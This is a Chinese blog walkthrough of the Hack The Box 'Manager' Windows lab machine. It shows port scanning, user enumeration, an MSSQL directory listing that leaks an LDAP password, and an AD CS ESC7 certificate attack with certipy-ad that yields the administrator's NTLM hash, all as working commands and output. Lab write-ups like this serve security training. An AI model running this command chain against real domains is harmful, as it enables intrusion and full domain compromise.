htb manager

标签：htb Windows tcp manager open Microsoft

nmap -sC -sV -p- -v -Pn -T4 10.10.11.236
Host is up (0.22s latency).
Not shown: 65512 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: Manager
|http-server-header: Microsoft-IIS/10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
| Potentially risky methods: TRACE
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-01-06 16:22:19Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.manager.htb
| Issuer: commonName=manager-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-30T17:08:51
| Not valid after: 2122-07-27T10:31:04
| MD5: bc56 af22 5a3d db67 c9bb a439 4232 14d1
|_SHA-1: 2b6d 98b3 d379 df64 59f6 c665 d4b7 53b0 faf6 e07a
|_ssl-date: 2025-01-06T16:23:56+00:00; +7h00m01s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-01-06T16:23:57+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.manager.htb
| Issuer: commonName=manager-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-30T17:08:51
| Not valid after: 2122-07-27T10:31:04
| MD5: bc56 af22 5a3d db67 c9bb a439 4232 14d1
|_SHA-1: 2b6d 98b3 d379 df64 59f6 c665 d4b7 53b0 faf6 e07a
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-01-06T05:46:17
| Not valid after: 2055-01-06T05:46:17
| MD5: 346f d375 c363 4b3c d3b1 400e 6689 28df
|SHA-1: bd8f a0a9 3270 3fa0 7874 6ecd c492 bc02 bc4f 9fa4
| ms-sql-ntlm-info:
| Target_Name: MANAGER
| NetBIOS_Domain_Name: MANAGER
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: manager.htb
| DNS_Computer_Name: dc01.manager.htb
| DNS_Tree_Name: manager.htb
| Product_Version: 10.0.17763
|_ssl-date: 2025-01-06T16:23:56+00:00; +7h00m00s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.manager.htb
| Issuer: commonName=manager-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-30T17:08:51
| Not valid after: 2122-07-27T10:31:04
| MD5: bc56 af22 5a3d db67 c9bb a439 4232 14d1
|_SHA-1: 2b6d 98b3 d379 df64 59f6 c665 d4b7 53b0 faf6 e07a
|_ssl-date: 2025-01-06T16:23:56+00:00; +7h00m01s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.manager.htb
| Issuer: commonName=manager-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-30T17:08:51
| Not valid after: 2122-07-27T10:31:04
| MD5: bc56 af22 5a3d db67 c9bb a439 4232 14d1
|_SHA-1: 2b6d 98b3 d379 df64 59f6 c665 d4b7 53b0 faf6 e07a
|_ssl-date: 2025-01-06T16:23:57+00:00; +7h00m00s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|http-server-header: Microsoft-HTTPAPI/2.0
|http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49689/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49690/tcp open msrpc Microsoft Windows RPC
49691/tcp open msrpc Microsoft Windows RPC
49721/tcp open msrpc Microsoft Windows RPC
49793/tcp open msrpc Microsoft Windows RPC
64371/tcp open tcpwrapped
64411/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
| 3.1.1:
| Message signing enabled and required
|clock-skew: mean: 7h00m00s, deviation: 0s, median: 6h59m59s
| ms-sql-info:
| 10.10.11.236:1433:
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
| TCP port: 1433
| smb2-time:
| date: 2025-01-06T16:23:17
| start_date: N/A

NSE: Script Post-scanning.
Initiating NSE at 17:24
Completed NSE at 17:24, 0.00s elapsed
Initiating NSE at 17:24
Completed NSE at 17:24, 0.00s elapsed
Initiating NSE at 17:24
Completed NSE at 17:24, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 432.03 seconds
Raw packets sent: 196768 (8.658MB) | Rcvd: 232 (10.208KB)

./kerbrute userenum -d manager.htb --dc 10.10.11.236 ./dict/seclists/Usernames/cirt-default-usernames.txt

枚举出用户
operator@manager.htb

operator账号登录mssql

发现可以使用xp_dirtree过程调用
发现web文件

下载
发现配置文件

查看内容

dc01.manager.htb

389

dc=manager,dc=htb

microsoft

raven@manager.htb R4v3nBe5tD3veloP3r!123

cn=Operator1,CN=users,dc=manager,dc=htb

得到用户密码 ![image](/i/l/?n=24&i=blog/3405761/202501/3405761-20250107231047454-1274655490.png)

raven@manager.htbR4v3nBe5tD3veloP3r!123
尝试winrm连接,成功登录得到user.txt

Get-WindowsFeature -Name AD-Certificate
发现安装了adcs

adcs漏洞枚举
certipy-ad find -u raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123' -vulnerable -stdout -dc-ip 10.10.11.236 -debug

esc7漏洞利用
将用户添加到officer组
certipy-ad ca -ca manager-DC01-CA -dc-ip 10.10.11.236 -u raven -p 'R4v3nBe5tD3veloP3r!123' -add-officer raven

启用SubCA
certipy-ad ca -ca manager-DC01-CA -dc-ip 10.10.11.236 -u raven -p 'R4v3nBe5tD3veloP3r!123' -enable-template SubCA

申请证书
certipy-ad req -ca manager-DC01-CA -dc-ip 10.10.11.236 -u raven -p 'R4v3nBe5tD3veloP3r!123' -template SubCA -target dc01.manager.htb -upn administrator@manager.htb

certipy-ad ca -ca manager-DC01-CA -dc-ip 10.10.11.236 -u raven -p 'R4v3nBe5tD3veloP3r!123' -issue-request 24

certipy-ad req -ca manager-DC01-CA -dc-ip 10.10.11.236 -u raven -p 'R4v3nBe5tD3veloP3r!123' -template SubCA -target dc01.manager.htb -upn administrator@manager.htb -retrieve 24

certipy-ad auth -pfx administrator.pfx

发现时钟差异过大、同步时钟
ntpdate 10.10.11.236

发起认证获取管理员hash
certipy-ad auth -pfx administrator.pfx -dc-ip 10.10.11.236

得到hash,后半部分为ntlm hash
aad3b435b51404eeaad3b435b51404ee:ae5064c2f62317332c88629e025924ef

标签：htb,Windows,tcp,manager,open,Microsoft
From： https://www.cnblogs.com/v3n0m-cccccc/p/18658633

相关文章

赞助商

阅读排行